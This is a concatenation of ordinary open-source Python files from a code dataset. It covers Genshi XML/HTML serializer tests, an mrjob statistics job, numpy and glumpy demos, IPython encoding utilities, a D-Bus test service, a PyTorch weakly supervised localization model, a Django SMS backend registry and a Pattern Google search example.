(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('div'), (None, -1, -1)),
])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual("""<div>
<p xmlns="http://example.org/"/>
<p xmlns="http://example.org/"/>
</div>""", output)
def test_multiple_bound_namespaces(self):
stream = Stream([
(Stream.START, (QName('div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('div'), (None, -1, -1)),
])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual("""<div>
<x:p xmlns:x="http://example.org/"/>
<x:p xmlns:x="http://example.org/"/>
</div>""", output)
def test_atom_with_xhtml(self):
text = """<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
<id>urn:uuid:c60843aa-0da8-4fa6-bbe5-98007bc6774e</id>
<updated>2007-01-28T11:36:02.807108-06:00</updated>
<title type="xhtml">
<div xmlns="http://www.w3.org/1999/xhtml">Example</div>
</title>
<subtitle type="xhtml">
<div xmlns="http://www.w3.org/1999/xhtml">Bla bla bla</div>
</subtitle>
<icon/>
</feed>"""
output = XML(text).render(XMLSerializer, encoding=None)
self.assertEqual(text, output)
class XHTMLSerializerTestCase(unittest.TestCase):
def test_xml_decl_dropped(self):
stream = Stream([(Stream.XML_DECL, ('1.0', None, -1), (None, -1, -1))])
output = stream.render(XHTMLSerializer, doctype='xhtml', encoding=None)
self.assertEqual('<!DOCTYPE html PUBLIC '
'"-//W3C//DTD XHTML 1.0 Strict//EN" '
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\n',
output)
def test_xml_decl_included(self):
stream = Stream([(Stream.XML_DECL, ('1.0', None, -1), (None, -1, -1))])
output = stream.render(XHTMLSerializer, doctype='xhtml',
drop_xml_decl=False, encoding=None)
self.assertEqual('<?xml version="1.0"?>\n'
'<!DOCTYPE html PUBLIC '
'"-//W3C//DTD XHTML 1.0 Strict//EN" '
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\n',
output)
def test_xml_lang(self):
text = '<p xml:lang="en">English text</p>'
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual('<p lang="en" xml:lang="en">English text</p>', output)
def test_xml_lang_nodup(self):
text = '<p xml:lang="en" lang="en">English text</p>'
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual('<p xml:lang="en" lang="en">English text</p>', output)
def test_textarea_whitespace(self):
content = '\nHey there. \n\n I am indented.\n'
stream = XML('<textarea name="foo">%s</textarea>' % content)
output = stream.render(XHTMLSerializer, encoding=None)
self.assertEqual('<textarea name="foo">%s</textarea>' % content, output)
def test_pre_whitespace(self):
content = '\nHey <em>there</em>. \n\n I am indented.\n'
stream = XML('<pre>%s</pre>' % content)
output = stream.render(XHTMLSerializer, encoding=None)
self.assertEqual('<pre>%s</pre>' % content, output)
def test_xml_space(self):
text = '<foo xml:space="preserve"> Do not mess \n\n with me </foo>'
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual('<foo> Do not mess \n\n with me </foo>', output)
def test_empty_script(self):
text = """<html xmlns="http://www.w3.org/1999/xhtml">
<script src="foo.js" />
</html>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual("""<html xmlns="http://www.w3.org/1999/xhtml">
<script src="foo.js"></script>
</html>""", output)
def test_script_escaping(self):
text = """<script>/*<![CDATA[*/
if (1 < 2) { alert("Doh"); }
/*]]>*/</script>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_script_escaping_with_namespace(self):
text = """<script xmlns="http://www.w3.org/1999/xhtml">/*<![CDATA[*/
if (1 < 2) { alert("Doh"); }
/*]]>*/</script>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_style_escaping(self):
text = """<style>/*<![CDATA[*/
html > body { display: none; }
/*]]>*/</style>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_style_escaping_with_namespace(self):
text = """<style xmlns="http://www.w3.org/1999/xhtml">/*<![CDATA[*/
html > body { display: none; }
/*]]>*/</style>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_embedded_svg(self):
text = """<html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg">
<body>
<button>
<svg:svg width="600px" height="400px">
<svg:polygon id="triangle" points="50,50 50,300 300,300"></svg:polygon>
</svg:svg>
</button>
</body>
</html>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_xhtml_namespace_prefix(self):
text = """<div xmlns="http://www.w3.org/1999/xhtml">
<strong>Hello</strong>
</div>"""
output = XML(text).render(XHTMLSerializer, encoding=None)
self.assertEqual(text, output)
def test_nested_default_namespaces(self):
stream = Stream([
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('div'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1))
])
output = stream.render(XHTMLSerializer, encoding=None)
self.assertEqual("""<div xmlns="http://example.org/">
<p></p>
<p></p>
</div>""", output)
def test_nested_bound_namespaces(self):
stream = Stream([
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('div'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1))
])
output = stream.render(XHTMLSerializer, encoding=None)
self.assertEqual("""<div xmlns:x="http://example.org/">
<p></p>
<p></p>
</div>""", output)
def test_html5_doctype(self):
stream = HTML(u'<html></html>')
output = stream.render(XHTMLSerializer, doctype=DocType.HTML5,
encoding=None)
self.assertEqual('<!DOCTYPE html>\n<html></html>', output)
class HTMLSerializerTestCase(unittest.TestCase):
def test_xml_lang(self):
text = '<p xml:lang="en">English text</p>'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<p lang="en">English text</p>', output)
def test_xml_lang_nodup(self):
text = '<p lang="en" xml:lang="en">English text</p>'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<p lang="en">English text</p>', output)
def test_textarea_whitespace(self):
content = '\nHey there. \n\n I am indented.\n'
stream = XML('<textarea name="foo">%s</textarea>' % content)
output = stream.render(HTMLSerializer, encoding=None)
self.assertEqual('<textarea name="foo">%s</textarea>' % content, output)
def test_pre_whitespace(self):
content = '\nHey <em>there</em>. \n\n I am indented.\n'
stream = XML('<pre>%s</pre>' % content)
output = stream.render(HTMLSerializer, encoding=None)
self.assertEqual('<pre>%s</pre>' % content, output)
def test_xml_space(self):
text = '<foo xml:space="preserve"> Do not mess \n\n with me </foo>'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<foo> Do not mess \n\n with me </foo>', output)
def test_empty_script(self):
text = '<script src="foo.js" />'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<script src="foo.js"></script>', output)
def test_script_escaping(self):
text = '<script>if (1 < 2) { alert("Doh"); }</script>'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<script>if (1 < 2) { alert("Doh"); }</script>',
output)
def test_script_escaping_with_namespace(self):
text = """<script xmlns="http://www.w3.org/1999/xhtml">
if (1 < 2) { alert("Doh"); }
</script>"""
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual("""<script>
if (1 < 2) { alert("Doh"); }
</script>""", output)
def test_style_escaping(self):
text = '<style>html > body { display: none; }</style>'
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual('<style>html > body { display: none; }</style>',
output)
def test_style_escaping_with_namespace(self):
text = """<style xmlns="http://www.w3.org/1999/xhtml">
html > body { display: none; }
</style>"""
output = XML(text).render(HTMLSerializer, encoding=None)
self.assertEqual("""<style>
html > body { display: none; }
</style>""", output)
def test_html5_doctype(self):
stream = HTML(u'<html></html>')
output = stream.render(HTMLSerializer, doctype=DocType.HTML5,
encoding=None)
self.assertEqual('<!DOCTYPE html>\n<html></html>', output)
class EmptyTagFilterTestCase(unittest.TestCase):
def test_empty(self):
stream = XML('<elem></elem>') | EmptyTagFilter()
self.assertEqual([EmptyTagFilter.EMPTY], [ev[0] for ev in stream])
def test_text_content(self):
stream = XML('<elem>foo</elem>') | EmptyTagFilter()
self.assertEqual([Stream.START, Stream.TEXT, Stream.END],
[ev[0] for ev in stream])
def test_elem_content(self):
stream = XML('<elem><sub /><sub /></elem>') | EmptyTagFilter()
self.assertEqual([Stream.START, EmptyTagFilter.EMPTY,
EmptyTagFilter.EMPTY, Stream.END],
[ev[0] for ev in stream])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(XMLSerializerTestCase, 'test'))
suite.addTest(unittest.makeSuite(XHTMLSerializerTestCase, 'test'))
suite.addTest(unittest.makeSuite(HTMLSerializerTestCase, 'test'))
suite.addTest(unittest.makeSuite(EmptyTagFilterTestCase, 'test'))
suite.addTest(doctest.DocTestSuite(XMLSerializer.__module__))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| dag/genshi | genshi/tests/output.py | Python | bsd-3-clause | 21,084 |
from mrjob.job import MRJob
from itertools import combinations
class MRStatistics(MRJob):
def mapper(self, key, line):
account_id, user_id, purchased, session_start_time, session_end_time = line.split()
purchased = int(purchased)
session_duration = int(session_end_time) - int(session_start_time)
# y^0, y^1, y^2 - session count, purchased, purchased
yield (account_id, 'conversion rate'), (1, purchased, purchased) # purchased ^ 2 = purchased
# y^0, y^1, y^2 - session count, sum session times, sum of squares of session times
yield (account_id, 'average session length'), (1, session_duration, session_duration ** 2)
def reducer(self, metric, metric_values):
# for metric, yield [sum(y^0), sum(y^1), sum(y^2)]
yield metric, reduce(lambda x, y: map(sum, zip(x, y)), metric_values)
if __name__ == '__main__':
MRStatistics.run()
| jepatti/mrjob_recipes | statistic_rollup/statistic_summarize.py | Python | bsd-3-clause | 920 |
import numpy as np
print '*******numpy array***********'
randArray = np.random.rand(4,4)
randMat = np.mat(randArray)
irandMat = randMat.I
a1=np.array(range(10,30,5))
a11=a1.reshape((2,2))
a111 = np.arange(12).reshape(3,4)
a2=np.linspace(0,2,10)
b=np.zeros((3,4))
c=np.ones((2,3,4),dtype='int16')
d=np.empty((2,3))
print a1,a11,a2,b,c,d
A1=np.arange(12)
print A1
A1.shape=(3,4) #A.reshape(3,4)
M=np.mat(A1.copy())
#Vector Stacking
x = np.arange(0,10,2) # x=([0,2,4,6,8])
y = np.arange(5) # y=([0,1,2,3,4])
m = np.vstack([x,y]) # m=([[0,2,4,6,8],
# [0,1,2,3,4]])
xy = np.hstack([x,y]) # xy =([0,2,4,6,8,0,1,2,3,4])
A=np.array([[1,1],[0,1]])
B=np.array([[2,0],[3,4]])
C=A*B # elementwise product
D=np.dot(A,B) # matrix product
a = np.random.random((2,3))
asum=a.sum()
amin=a.min()
amax=a.max()
print a,asum,amin,amax
print '*******numpy matrix***********'
A=np.matrix('1.0,2.0;3.0,4.0')
AT=A.T
B=A*AT
print A,AT,B | likeucode/PythonLearning | sciComputing/matrixComputing.py | Python | bsd-3-clause | 1,067 |
# coding: utf-8
"""
Utilities for dealing with text encodings
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2012 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import sys
import locale
import warnings
# to deal with the possibility of sys.std* not being a stream at all
def get_stream_enc(stream, default=None):
"""Return the given stream's encoding or a default.
There are cases where ``sys.std*`` might not actually be a stream, so
check for the encoding attribute prior to returning it, and return
a default if it doesn't exist or evaluates as False. ``default``
is None if not provided.
"""
if not hasattr(stream, 'encoding') or not stream.encoding:
return default
else:
return stream.encoding
# Less conservative replacement for sys.getdefaultencoding, that will try
# to match the environment.
# Defined here as central function, so if we find better choices, we
# won't need to make changes all over IPython.
def getdefaultencoding():
"""Return IPython's guess for the default encoding for bytes as text.
Asks for stdin.encoding first, to match the calling Terminal, but that
is often None for subprocesses. Fall back on locale.getpreferredencoding()
which should be a sensible platform default (that respects LANG environment),
and finally to sys.getdefaultencoding() which is the most conservative option,
and usually ASCII.
"""
enc = get_stream_enc(sys.stdin)
if not enc or enc=='ascii':
try:
# There are reports of getpreferredencoding raising errors
# in some cases, which may well be fixed, but let's be conservative here.
enc = locale.getpreferredencoding()
except Exception:
pass
enc = enc or sys.getdefaultencoding()
# On windows `cp0` can be returned to indicate that there is no code page.
# Since cp0 is an invalid encoding return instead cp1252 which is the
# Western European default.
if enc == 'cp0':
warnings.warn(
"Invalid code page cp0 detected - using cp1252 instead."
"If cp1252 is incorrect please ensure a valid code page "
"is defined for the process.", RuntimeWarning)
return 'cp1252'
return enc
DEFAULT_ENCODING = getdefaultencoding()
| marcoantoniooliveira/labweb | oscar/lib/python2.7/site-packages/IPython/utils/encoding.py | Python | bsd-3-clause | 2,724 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2014, Nicolas P. Rougier. All Rights Reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
import numpy as np
from glumpy import app, gl, gloo
from glumpy.transforms import Position, OrthographicProjection, PanZoom
# Create window
window = app.Window(width=1024, height=512)
quad_vertex = """
attribute vec2 position;
void main (void) { gl_Position = vec4(position,0,1); }
"""
quad_fragment = """
void main(void) { gl_FragColor = vec4(1,1,1,1.0/128.0); }
"""
line_vertex = """
attribute vec2 position;
void main (void) { gl_Position = vec4(position,0,1); }
"""
line_fragment = """
void main(void) { gl_FragColor = vec4(0,0,0,1); }
"""
@window.event
def on_draw(dt):
global time
time += np.random.uniform(0,dt)
quad.draw(gl.GL_TRIANGLE_STRIP)
line.draw(gl.GL_LINE_STRIP)
window.swap()
quad.draw(gl.GL_TRIANGLE_STRIP)
line.draw(gl.GL_LINE_STRIP)
X = line["position"][:,0]
scale = np.random.uniform(0.1,0.5)
frequency = np.random.uniform(3,5)
noise = 0.01*np.random.uniform(-1,+1,n)
line["position"][:,1] = scale*np.cos(frequency*X + time) + noise
@window.event
def on_init():
gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_DST_ALPHA)
@window.event
def on_resize(width, height):
window.clear()
window.swap()
window.clear()
n = 512
line = gloo.Program(line_vertex, line_fragment, count=n)
line["position"][:,0] = np.linspace(-1,1,n)
line["position"][:,1] = np.random.uniform(-0.5,0.5,n)
quad = gloo.Program(quad_vertex, quad_fragment, count=4)
quad['position'] = [(-1,-1), (-1,+1), (+1,-1), (+1,+1)]
time = 0
app.run()
| duyuan11/glumpy | examples/gloo-trace.py | Python | bsd-3-clause | 1,814 |
#!/usr/bin/env python
import os
import time
from threading import Timer
from pprint import pprint
from datetime import datetime
import gobject
import glob
import dbus
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
DBusGMainLoop(set_as_default=True)
gobject.threads_init() # Multithreaded python programs must call this before using threads.
bus = dbus.SessionBus()
loop = gobject.MainLoop()
"""
This is a shared interface between two objects.
"""
InterfaceA = "nl.ict.AABUnitTest.A"
"""
Objects who have the InterfaceOnBulkTransfer interface must implement
onBulkRequest(String fifoToPayload, String fifoToAndroid, String requestedBulkData)
"""
InterfaceOnBulkTransfer = "nl.ict.aapbridge.bulk"
"""
bus-name : nl.ict.AABUnitTest
objectpaths: /nl/ict/AABUnitTestB
/nl/ict/AABUnitTestC
/nl/ict/AABUnitTest/bulk/echo1
/nl/ict/AABUnitTest/bulk/echo2
interfaces : nl.ict.AABUnitTest.B
nl.ict.AABUnitTest.Methods
nl.ict.AABUnitTest.Signals
nl.ict.aapbridge.bulk
"""
class AABUnitTestB(dbus.service.Object):
InterfaceB = "nl.ict.AABUnitTest.Methods"
def __init__(self, object_path, bus_name):
dbus.service.Object.__init__(self, bus_name, object_path)
@dbus.service.method(InterfaceA, in_signature='', out_signature='')
def LocalEcho(self):
print(str(datetime.now()) + " Local echo from AABUnitTestB")
@dbus.service.method(InterfaceB, in_signature='y', out_signature='y')
def ExpectingByte(self, val):
print(str(datetime.now()) + " Expecting: y Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='b', out_signature='b')
def ExpectingBoolean(self, val):
print(str(datetime.now()) + " Expecting: b Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='n', out_signature='n')
def ExpectingInt16(self, val):
print(str(datetime.now()) + " Expecting: n Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='q', out_signature='q')
def ExpectingUint16(self, val):
print(str(datetime.now()) + " Expecting: q Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='i', out_signature='i')
def ExpectingInt32(self, val):
print(str(datetime.now()) + " Expecting: i Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='u', out_signature='u')
def ExpectingUint32(self, val):
print(str(datetime.now()) + " Expecting: u Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='x', out_signature='x')
def ExpectingInt64(self, val):
print(str(datetime.now()) + " Expecting: x Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='t', out_signature='t')
def ExpectingUint64(self, val):
print(str(datetime.now()) + " Expecting: t Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='d', out_signature='d')
def ExpectingDouble(self, val):
print(str(datetime.now()) + " Expecting: d Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='s', out_signature='s')
def ExpectingString(self, val):
print(str(datetime.now()) + " Expecting: s Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='o', out_signature='o')
def ExpectingObjectPath(self, val):
print(str(datetime.now()) + " Expecting: o Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='g', out_signature='g')
def ExpectingSignature(self, val):
print(str(datetime.now()) + " Expecting: g Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='ai', out_signature='ai')
def ExpectingArrayInt32(self, val):
print(str(datetime.now()) + " Expecting: ai Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='(isi)', out_signature='(isi)')
def ExpectingStruct1(self, val):
print(str(datetime.now()) + " Expecting: (isi) Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='a{si}', out_signature='a{si}')
def ExpectingDict(self, val):
print(str(datetime.now()) + " Expecting: a{si} Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='h', out_signature='h')
def ExpectingFd(self, val):
print(str(datetime.now()) + " Expecting: h Got: "+repr(val) )
return val;
@dbus.service.method(InterfaceB, in_signature='ssss', out_signature='ssss')
def ExpectingMultiString(self, uno, duo, tres, dos ):
print(str(datetime.now()) + " Expecting: ssss Got: "+repr( (uno, duo, tres, dos) ))
return (uno, duo, tres, dos);
@dbus.service.method(InterfaceB, in_signature='yyiyx', out_signature='yyiyx')
def ExpectingComplex1(self, byte1,byte2,i,byte3,x ):
print(str(datetime.now()) + " Expecting: yyiyx Got: "+repr( (byte1,byte2,i,byte3,x) ))
return (byte1,byte2,i,byte3,x);
@dbus.service.method(InterfaceB, in_signature='', out_signature='')
def ExceptionThrower1(self):
raise NotImplementedError, "I diddent had time to implement this function"
@dbus.service.method(InterfaceB, in_signature='', out_signature='')
def ExceptionThrower2(self):
raise TypeError, "Yeah well... no."
@dbus.service.method(InterfaceB, in_signature='', out_signature='')
def ReturnsNothing(self):
pass
class AABUnitTestC(dbus.service.Object):
InterfaceC = "nl.ict.AABUnitTest.Signals"
def __init__(self, object_path, bus_name):
dbus.service.Object.__init__(self, bus_name, object_path)
@dbus.service.method(InterfaceA, in_signature='', out_signature='')
def LocalEcho(self):
print(str(datetime.now()) + " Local echo from AABUnitTestC")
@dbus.service.signal(InterfaceC, signature='y')
def Byte(self,val):
pass
@dbus.service.signal(InterfaceC, signature='b')
def Boolean(self,val):
pass
@dbus.service.signal(InterfaceC, signature='n')
def Int16(self,val):
pass
@dbus.service.signal(InterfaceC, signature='q')
def Uint32(self,val):
pass
@dbus.service.signal(InterfaceC, signature='i')
def Int32(self,val):
pass
@dbus.service.signal(InterfaceC, signature='d')
def Double(self,val):
pass
@dbus.service.signal(InterfaceC, signature='s')
def String(self,val):
pass
@dbus.service.signal(InterfaceC, signature='sd')
def Sensor(self,name,value):
pass
@dbus.service.signal(InterfaceC, signature='ysdyi')
def Complex1(self,var1,var2,var3,var4,var5):
pass
def Emit(self):
self.Byte(2)
time.sleep(5)
self.Boolean(True)
time.sleep(5)
self.Int32(3)
time.sleep(5)
self.String("The only real advantage to punk music is that nobody can whistle it.")
time.sleep(5)
self.Double(5.5)
time.sleep(5)
self.Sensor("humidity1",9.923)
time.sleep(5)
self.Complex1(8,"Never do today what you can put off until tomorrow.",45.00000003,9,9084)
@dbus.service.method(InterfaceC, in_signature='', out_signature='')
def StartEmittingSignals(self):
print("Starting to emit signals")
emitter = Timer(5, AABUnitTestC.Emit, [self])
emitter.start()
def onEchoIOReady(source, cb_condition, fifoToPayload, fifoToAndroid):
if(cb_condition is gobject.IO_HUP):
fifoToAndroid.close()
return False
try:
fifoToAndroid.write(os.read(fifoToPayload, 5000))
fifoToAndroid.flush()
except:
fifoToAndroid.close()
return False
return True
def onBulkEchoRequest(fifoToPayloadPath, fifoToAndroidPath, requestedBulkData):
print("Opening fifo's")
fifoToPayload = os.open(fifoToPayloadPath, os.O_RDONLY )
fifoToAndroid = open(fifoToAndroidPath, 'w')
print("Fifo's are open")
gobject.io_add_watch(fifoToPayload, gobject.IO_IN | gobject.IO_HUP, onEchoIOReady, fifoToPayload, fifoToAndroid)
class BulkTransferEcho(dbus.service.Object):
def __init__(self, object_path, bus_name):
dbus.service.Object.__init__(self, bus_name, object_path)
@dbus.service.method(InterfaceOnBulkTransfer, in_signature='sss', out_signature='')
def onBulkRequest(self, fifoToPayloadPath, fifoToAndroidPath, requestedBulkData):
print("onBulkRequest: "+fifoToPayloadPath+" "+fifoToAndroidPath+" "+requestedBulkData)
gobject.idle_add(onBulkEchoRequest, fifoToPayloadPath, fifoToAndroidPath, requestedBulkData)
bus_name = dbus.service.BusName('nl.ict.AABUnitTest', bus)
serviceB = AABUnitTestB('/nl/ict/AABUnitTest/B',bus_name)
serviceC = AABUnitTestC('/nl/ict/AABUnitTest/C',bus_name)
bulkEcho1 = BulkTransferEcho('/nl/ict/AABUnitTest/bulk/echo1',bus_name)
bulkEcho2 = BulkTransferEcho('/nl/ict/AABUnitTest/bulk/echo2',bus_name)
print("Starting event loop")
loop.run()
| Benny-/android-accessory-protocol-bridge | Accessory/Payloads/testStub.py | Python | bsd-3-clause | 9,363 |
"""
Model definition for weakly supervised object localization with pytorch
=====================================================================
*Author*: Yu Zhang, Northwestern Polytechnical University
"""
import torch
import torch.nn as nn
import numpy as np
import os
# import shutil
import torchvision.models as models
from spn.modules import SoftProposal
import spn_codes.spatialpooling as spatialpooling
class WSL(nn.Module):
def __init__(self, num_classes=20, num_maps=1024):
super(WSL, self).__init__()
model = models.vgg16(pretrained=True)
num_features = model.features[28].out_channels
self.features = nn.Sequential(*list(model.features.children())[:-1])
# self.spatial_pooling = pooling
self.addconv = nn.Conv2d(num_features, num_maps, kernel_size=3,
stride=1, padding=1, groups=2, bias=True)
self.maps = nn.ReLU()
self.sp = SoftProposal()
self.sum = spatialpooling.SpatialSumOverMap()
# classification layer
self.classifier = nn.Sequential(
nn.Dropout(0.5),
nn.Linear(num_maps, num_classes)
)
def forward(self, x):
x = self.features(x)
x = self.addconv(x)
x = self.maps(x)
sp = self.sp(x)
x = self.sum(sp)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
def get_att_map(self, x):
x = self.features(x)
x = self.addconv(x)
x = self.maps(x)
sp = self.sp(x)
x = self.sum(sp)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x, sp
# def load_pretrained_vgg(self, fname):
# vgg_param = np.load(fname, encoding='latin1').item() # vgg16
# net_param = self.state_dict()
# para_keys = list(net_param.keys())
# for idx in range(26):
# name = para_keys[idx]
# val = net_param[name]
# i, j = int(name[4]), int(name[6]) + 1
# ptype = 'weights' if name[-1] == 't' else 'biases'
# key = 'conv{}_{}'.format(i, j)
# param = torch.from_numpy(vgg_param[key][ptype])
# if ptype == 'weights':
# param = param.permute(3, 2, 0, 1)
# val.copy_(param)
def load_checkpoint(self, fname):
if os.path.isfile(fname):
print('loading checkpoint {}'.format(fname))
checkpt = torch.load(fname)
self.load_state_dict(checkpt['state_dict'])
else:
print('{} not found'.format(fname))
class ConvReLU(nn.Module):
def __init__(self, in_ch, out_ch, kernel_sz, stride=1, relu=True, pd=True, bn=False):
super(ConvReLU, self).__init__()
padding = int((kernel_sz - 1) / 2) if pd else 0 # same spatial size by default
self.conv = nn.Conv2d(in_ch, out_ch, kernel_sz, stride, padding=padding)
self.bn = nn.BatchNorm2d(out_ch, eps=0.001, momentum=0, affine=True) if bn else None
self.relu = nn.ReLU(inplace=True) if relu else None
def forward(self, x):
x = self.conv(x)
if self.bn is not None:
x = self.bn(x)
if self.relu is not None:
x = self.relu(x)
return x
class ClsConv(nn.Module):
"""docstring for ClsConv"""
def __init__(self, in_ch=512, bn=False):
super(ClsConv, self).__init__()
self.conv_layers = nn.Sequential(ConvReLU(in_ch, 256, 3, pd=True, bn=bn),
ConvReLU(256, 128, 3, pd=True, bn=bn),
ConvReLU(128, 64, 3, pd=True, bn=bn),
nn.Conv2d(64, 1, kernel_size=3, stride=1, padding=1))
def forward(self, feature):
return self.conv_layers(feature)
def save_checkpoint(state, filename='checkpoint.pth.tar'):
torch.save(state, filename)
def load_pretrained(model, fname, optimizer=None):
"""
resume training from previous checkpoint
:param fname: filename(with path) of checkpoint file
:return: model, optimizer, checkpoint epoch for train or only model for test
"""
if os.path.isfile(fname):
print("=> loading checkpoint '{}'".format(fname))
checkpoint = torch.load(fname)
model.load_state_dict(checkpoint['state_dict'])
if optimizer is not None:
optimizer.load_state_dict(checkpoint['optimizer'])
return model, optimizer, checkpoint['epoch']
else:
return model
else:
raise Exception("=> no checkpoint found at '{}'".format(fname))
| zhangyuygss/WSL | model/model.py | Python | bsd-3-clause | 4,628 |
from django.conf import settings
from django.core.urlresolvers import get_mod_func
REGISTRY = {}
backends = getattr(settings, 'SMSGATEWAY_BACKENDS', ())
for entry in backends:
module_name, class_name = get_mod_func(entry)
backend_class = getattr(__import__(module_name, {}, {}, ['']), class_name)
instance = backend_class()
REGISTRY[instance.get_slug()] = instance
def get_backend(slug):
return REGISTRY.get(slug, None)
| peterayeni/django-smsgateway | smsgateway/backends/__init__.py | Python | bsd-3-clause | 444 |
import os, sys; sys.path.insert(0, os.path.join("..", ".."))
from pattern.web import Google, plaintext
from pattern.web import SEARCH
# The web module has a SearchEngine class with a search() method
# that yields a list of Result objects.
# Each Result has url, title, description, language, author and date and properties.
# Subclasses of SearchEngine include:
# Google, Yahoo, Bing, Twitter, Facebook, Wikipedia, Flickr.
# This example retrieves results from Google based on a given query.
# The Google search engine can handle SEARCH type searches.
# Google's "Custom Search API" is a paid service.
# The web module uses a test account with a 100 free queries per day, shared with all users.
# If the limit is exceeded, SearchEngineLimitError is raised.
# You can obtain your own license key at: https://code.google.com/apis/console/
# Activate "Custom Search API" under "Services" and get the key under "API Access".
# Then use Google(license=[YOUR_KEY]).search().
# This will give you 100 personal free queries, or 5$ per 1000 queries.
engine = Google(license=None, language="en")
